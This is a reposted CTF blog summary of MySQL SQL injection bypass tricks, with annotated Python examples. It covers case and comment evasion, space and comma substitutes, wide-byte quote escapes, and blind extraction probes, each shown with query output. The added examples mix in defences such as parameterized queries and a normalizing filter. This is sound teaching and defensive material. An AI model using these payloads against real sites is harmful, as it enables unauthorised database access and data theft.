
Summary of SQL injection bypass methods

2022-06-22 11:58:00 nigo134

Reposted from: "Summary of SQL injection bypass methods" on huanghelouzi's CSDN blog.

Preface

SQL injection turns up in every CTF, so this is a summary kept as a reminder. Last updated 2018/10/11.

In short: SQL injection is user-supplied data becoming part of the code that gets executed.

    string sql = "select id,no from user where id=" + id;

The intent is that the user supplies a single value for id, which is concatenated into the string and sent to the database. But when the input is 2 or 1=1, the or 1=1 part is no longer data: it becomes part of the SQL statement and is executed, and the condition is true for every row.
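As an added example (not code from the original post), the concatenation above and its parameterized fix, run against a constructed three-row users table in an in-memory SQLite database. The table contents, the two lookup functions and the use of SQLite instead of MySQL are assumptions for the demonstration; the behaviour is the same with any driver that supports bound parameters.

```python
import sqlite3

# Constructed sample data: the same three users the page's mysql> sessions show.
USERS = [(1, "test1", "pass"), (2, "user2", "pass1"), (3, "test3", "pass1")]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany("insert into users values (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The page's pattern: the user's value is pasted into the statement,
    so anything in it that parses as SQL is executed as SQL."""
    sql = "select id, username from users where id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the value travels as a bound parameter and is compared
    as data; '2 or 1=1' is just a string that equals no id."""
    sql = "select id, username from users where id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("2", "2 or 1=1"):
        print(repr(value), "vulnerable:    ", lookup_vulnerable(db, value))
        print(repr(value), "parameterized: ", lookup_parameterized(db, value))
```

With the benign input both functions return the single row for id 2; with the injected input the concatenated query returns the whole table, while the parameterized one returns nothing because the comparison never leaves the data channel.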

sql Injection bypass

Comment symbol bypass

The comment syntaxes commonly used are:

--   comment (MySQL requires whitespace after the two dashes, so in a URL it is usually sent as --+ or -- -)
#    comment
/* comment */
;    not a comment but a statement terminator; it only cuts off the rest of the statement where the driver allows several statements in one query

Example:

mysql> select * from users -- where id = 1;
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
mysql> select * from users # where id = 2;
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
mysql> select * from users where id = 3 /*+1*/
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+
1 row in set (0.00 sec)

Case bypass

Some WAF rules match keywords case-sensitively; when this shows up in a CTF it is usually deliberate on the challenge author's part.
For example, if the WAF filters the keyword select, try Select, SeLeCt and so on.

mysql> select * from users where id = -1 union select 1,2,3
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

# Case bypass
mysql> select * from users where id = -1 union Select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+

Inline comment bypass

An inline comment puts MySQL-only syntax inside /*!...*/. Other databases treat the contents as an ordinary comment and skip them, but MySQL executes them. The version-prefixed form /*!50000select*/ is executed only when the server version is at least the given number (5.00.00 here), which also makes it useful for fingerprinting the version.

mysql> select * from users where id = -1 union /*!select*/ 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+

Double-write keyword bypass

Some simple WAFs remove the keyword select with a single replace() that substitutes the empty string. Because the filter runs once and forwards the result instead of rejecting the request, writing the keyword twice defeats it: seleselectct becomes select after the inner select is removed, and the statement reaches the database with the keyword intact.
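As an added example (not part of the original post) covering the comment, case, inline-comment and double-write sections above: the strip-and-forward blacklist those tricks defeat, next to a filter that normalizes the statement the way MySQL will read it and rejects instead of rewriting. The keyword list and both filter functions are assumptions for the demonstration, not any real WAF's code.

```python
import re

# Assumed blacklist; a real WAF carries many more tokens.
KEYWORDS = ("select", "union", "from", "where")


def naive_filter(query: str) -> str:
    """The weak WAF from the page: one case-sensitive replace() per keyword,
    and whatever is left is forwarded to the database."""
    for kw in KEYWORDS:
        query = query.replace(kw, "")
    return query


def normalize(query: str) -> str:
    """Rewrite the statement the way MySQL's parser effectively sees it:
    - /*!...*/ and /*!50000...*/ executable comments are unwrapped, because
      MySQL runs their body;
    - every other /*...*/ comment becomes a single space (it is the usual
      space substitute);
    - runs of whitespace (space, tab, newline, \\v, \\f, \\r) collapse to one;
    - the result is lowercased so case tricks stop mattering."""
    query = re.sub(r"/\*!(?:\d{5})?(.*?)\*/", r" \1 ", query, flags=re.S)
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    query = re.sub(r"\s+", " ", query)
    return query.strip().lower()


def is_blocked(query: str) -> bool:
    """Detect-and-reject instead of strip-and-forward: nothing is rewritten
    and handed on, so the double-write trick has nothing left to exploit."""
    normalized = normalize(query)
    return any(kw in normalized for kw in KEYWORDS)


if __name__ == "__main__":
    for payload in ("-1 union Select 1,2,3",
                    "-1 union /*!select*/ 1,2,3",
                    "-1 union seleselectct 1,2,3",
                    "select/**/*/**/from/**/users"):
        print(f"{payload!r:40} naive -> {naive_filter(payload)!r:30} blocked: {is_blocked(payload)}")
```

The naive filter turns seleselectct into select and lets Select and /*!select*/ through untouched; the normalizing filter sees all four as the same statement. Normalization is the defensive reading of every bypass in this post: whatever the parser will accept, the filter has to fold first.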

Special encoding bypass

  • Hexadecimal bypass: a string literal can be written as a 0x hex literal, which needs no quotes
mysql> select * from users where username = 0x7465737431;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
  • ASCII code bypass
    'test' is equivalent to
    CHAR(116)+CHAR(101)+CHAR(115)+CHAR(116)
    tip: this form with + is SQL Server syntax. In MySQL, + is numeric addition, so it does not build a string; use the multi-argument form char(116,101,115,116) instead, which yields 'test'.

Space filter bypass

The usual substitutes for a filtered space are:

/**/           an empty comment
()             parentheses around expressions and table names
newline        %0a in URL encoding (tab %09, vertical tab %0b, form feed %0c and carriage return %0d are also accepted as whitespace by MySQL)
`              backticks around identifiers (the key above Tab)
tab
two consecutive spaces
mysql> select/**/*/**/from/**/users;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
+----+----------+----------+
# * cannot be placed inside parentheses: select(*)from(users) is a syntax error, so name the columns
mysql> select(id)from(users);
+----+
| id |
+----+
|  1 |
|  3 |

mysql> select
    -> *
    -> from 
    -> users
    -> where 
    -> id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
mysql> select`id`from`users`where`id`=1;
+----+
| id |
+----+
|  1 |
+----+

Filtering or, and, xor, not: bypass

and  =  &&
or   =  ||
xor  =  ^    (bitwise XOR, which agrees with xor on 0/1 values; note that | is bitwise OR, not XOR)
not  =  !

Filtering the equal sign: bypass

like without a wildcard behaves the same as =, so it can be used as a replacement.

like with a wildcard, for comparison:

mysql> select * from users where username like "test%";
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  3 | test3    | pass1    |
+----+----------+----------+

like without a wildcard can replace =:

mysql> select * from users where id like 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

rlike: regular-expression match; a row is selected when the field value contains a match for the pattern.
As a replacement for = it behaves like the like example above when the pattern has no metacharacters, but note that it is a substring match: id rlike 1 also matches ids such as 10 or 21. Anchor the pattern (rlike '^1$') when the table holds such values.

mysql> select * from users where id rlike 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

regexp: MySQL's REGEXP operator, a synonym of rlike, with the same substring-match caveat:

mysql> select * from users where id regexp 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

Using comparison operators to bypass = (bracket the value from both sides):

mysql> select * from users where id > 1 and id < 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | user2    | pass1    |
+----+----------+----------+

<> is equivalent to !=,
so negating it with ! turns it into an equality test:

mysql> select * from users where !(id <> 1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

The equal sign can also be replaced with the strcmp(str1,str2) function, the between keyword and so on; see the comparison-operator bypass below for details.

Filtering comparison operators: bypass

In blind SQL injection, < and > are normally used to compare the ASCII code of a character and narrow it down by brute force. If the comparison operators are filtered, that is awkward, but the following keywords and functions can take their place:

    greatest(n1, n2, n3…): returns the largest of its arguments, so greatest(x, n) = n is true exactly when x <= n

mysql> select * from users where id = 1 and greatest(ascii(substr(username,1,1)),1)=116;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
  • least(n1, n2, n3…): returns the smallest of its arguments

  • strcmp(str1, str2): returns 0 when the two strings are the same, -1 when the first is smaller than the second according to the current collation, and 1 otherwise. Because it compares strings, numbers are compared lexically ('9' sorts after '116'), so it is safest as an equality test on the result being 0 or not, as below: ascii('t') is 116, so strcmp(...,117) gives -1 (true) and strcmp(...,116) gives 0 (false).

mysql> select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),116);
Empty set (0.00 sec)
  • the in keyword
mysql> select * from users where id = 1 and substr(username,1,1) in ('t');
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.01 sec)

mysql> select * from users where id = 1 and substr(username,1,1) in ('y');
Empty set (0.00 sec)
  • between a and b: the range from a to b, inclusive of both ends
mysql> select * from users where id between 1 and 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql> select * from users where id = 1 and substr(username,1,1) between 'a' and 'b';
Empty set (0.00 sec)

mysql> select * from users where id = 1 and substr(username,1,1) between 'a' and 't';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

Using between a and b with the same bound on both sides tests equality:

mysql> select * from users where id = 1 and substr(username,1,1) between 't' and 't';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

Filtering quotes: bypass

  • Use hexadecimal (a 0x hex literal needs no quotes):
select column_name from information_schema.columns where table_name=0x7573657273;
  • Wide bytes

When the web application uses a multibyte character set such as GBK and escapes quotes with a backslash, try a wide-byte injection: the 0x5c of the inserted backslash is swallowed as the trailing byte of a two-byte GBK character, and the quote survives unescaped.

# When single quotes are escaped, prefix them with a high byte:
%bf%27  %df%27  %aa%27
%df'  ->  after escaping %df%5c%27  ->  decoded as GBK: 運'  (one CJK character followed by a bare quote)
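As an added example (not part of the original post) covering this section and the hexadecimal bypass above, the Python below builds the 0x literal for a string and simulates the wide-byte effect: a byte-oriented addslashes()-style escaper followed by decoding in the connection charset. The escaper, the helper names and the charsets compared are assumptions for the demonstration.

```python
def hex_literal(s: str, encoding: str = "utf-8") -> str:
    """MySQL 0x... literal equivalent to the quoted string s; no quotes needed."""
    return "0x" + s.encode(encoding).hex()


def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping as PHP's addslashes() or a naive quote filter
    does it: a backslash (0x5c) is inserted before every quote or backslash.
    It never looks at character boundaries, which is the whole problem."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_seen_by_server(raw: bytes, connection_charset: str) -> str:
    """What the SQL parser sees: the escaped bytes decoded in the connection
    charset. Under GBK a lead byte such as 0xdf combines with the inserted
    0x5c into one two-byte character and the quote is left unescaped."""
    return addslashes(raw).decode(connection_charset, errors="replace")


def quote_escaped(text: str) -> bool:
    """True when every single quote in the decoded text is preceded by a backslash."""
    return all(i > 0 and text[i - 1] == "\\" for i, c in enumerate(text) if c == "'")


if __name__ == "__main__":
    print(hex_literal("test1"))                 # the literal the page compares username against
    payload = b"\xdf'"                          # %df%27 on the wire
    for cs in ("latin-1", "gbk"):
        seen = as_seen_by_server(payload, cs)
        print(cs, repr(seen), "quote escaped:", quote_escaped(seen))
```

Under a single-byte charset the backslash stays in front of the quote; under GBK the same three bytes decode to two characters and the quote is free. The fix is not a better escaper but making the escaping function and the server agree on the connection charset (mysql_set_charset / SET NAMES through the driver) and, better still, bound parameters.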

Filtering commas: bypass

The following functions are commonly used in blind injection:

substr()
        substr(string, pos, len): take len characters starting at position pos
        substr(string, pos): take from pos to the end of string
substring()
        same usage as substr()
mid()
        same usage as substr(); in MySQL it is a synonym of substring(). In all of these, pos starts at 1
left() and right()
        left(string, len) and right(string, len): take the len characters at the left or right end of string
limit
        limit pos, len: return len rows of the result starting at row pos; pos starts at 0
ascii() and char()
        ascii(char): convert the character to its ASCII code
        char(ascii_int): the reverse of ascii(), convert an ASCII code to its character

Back to the point: if the WAF filters commas and only blind injection is possible (blind injection is hard to do without commas), the substring functions accept an alternative syntax that has none: substr(string from pos for len), which reads len characters starting at pos.
For example, the conventional form of substr() is

mysql> select substr("string",1,3);
+----------------------+
| substr("string",1,3) |
+----------------------+
| str                  |
+----------------------+

If commas are filtered, the from pos for len form replaces it:

mysql> select substr("string" from 1 for 3);
+-------------------------------+
| substr("string" from 1 for 3) |
+-------------------------------+
| str                           |
+-------------------------------+
1 row in set (0.00 sec)

So in blind injection with commas filtered, the comparison can be written as follows:

mysql> select ascii(substr(database() from 1 for 1)) > 120;
+----------------------------------------------+
| ascii(substr(database() from 1 for 1)) > 120 |
+----------------------------------------------+
|                                            0 |
+----------------------------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substr(database() from 1 for 1)) > 110;
+----------------------------------------------+
| ascii(substr(database() from 1 for 1)) > 110 |
+----------------------------------------------+
|                                            1 |
+----------------------------------------------+
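As an added example (not from the original post) that ties the comparison-operator bypass and the comma-free substr form together: a boolean-blind extraction loop that emits only comma-free conditions, optionally also free of < and > (using between as a range test, as in the size-bypass section), and recovers a string by binary search over the ASCII range. The oracle is a simulated endpoint that evaluates those two condition shapes against a constructed secret; SECRET, condition(), oracle() and extract() are all assumptions for the demonstration, not a real target.

```python
import re

SECRET = "security"   # constructed stand-in for the value of database()


def condition(pos: int, n: int, style: str) -> str:
    """SQL condition meaning 'the ascii code of the character at pos is > n',
    built with the comma-free substr(... from ... for ...) form.
    style 'gt' uses >; style 'between' avoids < and > entirely by testing
    the inclusive range n+1 .. 255."""
    char = f"ascii(substr(database() from {pos} for 1))"
    if style == "gt":
        return f"{char} > {n}"
    if style == "between":
        return f"{char} between {n + 1} and 255"
    raise ValueError(f"unknown style {style!r}")


_GT = re.compile(r"^ascii\(substr\(database\(\) from (\d+) for 1\)\) > (\d+)$")
_BETWEEN = re.compile(r"^ascii\(substr\(database\(\) from (\d+) for 1\)\) between (\d+) and 255$")


def code_at(pos: int) -> int:
    """MySQL semantics: substr is 1-based, returns '' past the end, and ascii('') is 0."""
    return ord(SECRET[pos - 1]) if 1 <= pos <= len(SECRET) else 0


def oracle(fragment: str) -> bool:
    """Simulated boolean-blind endpoint: true/false for the two shapes above."""
    if m := _GT.match(fragment):
        return code_at(int(m[1])) > int(m[2])
    if m := _BETWEEN.match(fragment):
        return int(m[2]) <= code_at(int(m[1])) <= 255
    raise ValueError(f"unsupported fragment: {fragment}")


def extract(style: str, blocked: tuple = (",",)) -> tuple:
    """Recover the string one character at a time by binary search over
    0..255, refusing to send any payload that contains a blocked token.
    Returns (value, number_of_oracle_queries)."""
    out, queries, pos = [], 0, 1
    while True:
        lo, hi = 0, 255                      # invariant: lo <= code <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            frag = condition(pos, mid, style)
            if any(tok in frag for tok in blocked):
                raise ValueError(f"payload would be blocked: {frag}")
            queries += 1
            if oracle(frag):                 # code > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                          # ascii('') == 0: past the end of the string
            return "".join(out), queries
        out.append(chr(lo))
        pos += 1


if __name__ == "__main__":
    print(extract("gt"))                                    # commas filtered
    print(extract("between", blocked=(",", "<", ">")))      # commas and < > filtered
```

Each character costs exactly 8 oracle queries (the search space is 256 codes), plus 8 more to detect the end of the string. ascii() only returns the leading byte of a multibyte character, so for non-ASCII data swap in ord() or compare hex() output, as the function-bypass section at the end of the post notes.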

The join keyword can also be used to avoid the commas in a union select:

mysql> select * from users  union select * from (select 1)a join (select 2)b join(select 3)c;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
|  1 | 2        | 3        |
+----+----------+----------+

Here

union select * from (select 1)a join (select 2)b join(select 3)c

is equivalent to

union select 1,2,3

because each derived table contributes one column. MySQL requires an alias (a, b, c) on every derived table.

Using the like keyword
Replaces the comma in substr() when extracting a substring: a like prefix pattern tests the leading characters directly.

mysql> select ascii(substr(user(),1,1))=114;
+-------------------------------+
| ascii(substr(user(),1,1))=114 |
+-------------------------------+
|                             1 |
+-------------------------------+

mysql> select user() like "r%";
+------------------+
| user() like "r%" |
+------------------+
|                1 |
+------------------+

mysql> select user() like "t%";
+------------------+
| user() like "t%" |
+------------------+
|                0 |
+------------------+

Using the offset keyword
Applies when the comma in limit is filtered:
limit 2,1 is equivalent to limit 1 offset 2

mysql> select * from users limit 2,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+

mysql> select * from users limit 1 offset 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+

Filtered functions: bypass

  • sleep() --> benchmark()
mysql> select 12,23 and sleep(1);
+----+-----------------+
| 12 | 23 and sleep(1) |
+----+-----------------+
| 12 |               0 |
+----+-----------------+
1 row in set (1.00 sec)
# MySQL has a built-in BENCHMARK() function for measuring how fast an expression executes.
# It takes the number of repetitions and the expression: benchmark(count, expr). The delay depends on the server's CPU, so calibrate count on the target (1000000000 iterations took 4.61 s here).
mysql> select 12,23 and benchmark(1000000000,1);
+----+--------------------------------+
| 12 | 23 and benchmark(1000000000,1) |
+----+--------------------------------+
| 12 |                              0 |
+----+--------------------------------+
1 row in set (4.61 sec)
  • ascii() --> hex(), bin()
    After substituting, compare against the string converted to the corresponding base
  • group_concat() --> concat_ws()
mysql> select group_concat("str1","str2");
+-----------------------------+
| group_concat("str1","str2") |
+-----------------------------+
| str1str2                    |
+-----------------------------+
1 row in set (0.00 sec)

# The first argument of concat_ws() is the separator. Note that group_concat() aggregates values across rows while concat_ws() joins values within one row, so they are interchangeable only for a single-row result.
mysql> select concat_ws(",","str1","str2");
+------------------------------+
| concat_ws(",","str1","str2") |
+------------------------------+
| str1,str2                    |
+------------------------------+
  • substr(), substring() and mid() are interchangeable; left() and right() also take substrings
  • user() --> session_user(), system_user() (synonyms of user()); datadir --> @@datadir, and likewise version() --> @@version. Note that @@user is not a MySQL system variable.
  • ord() --> ascii(): the two agree on single-byte (ASCII) characters but differ on multibyte characters such as Chinese, where ascii() returns only the leading byte.

Copyright notice
This article was written by [nigo134]; please include the original link when reposting, thanks
https://yzsam.com/2022/173/202206221126293532.html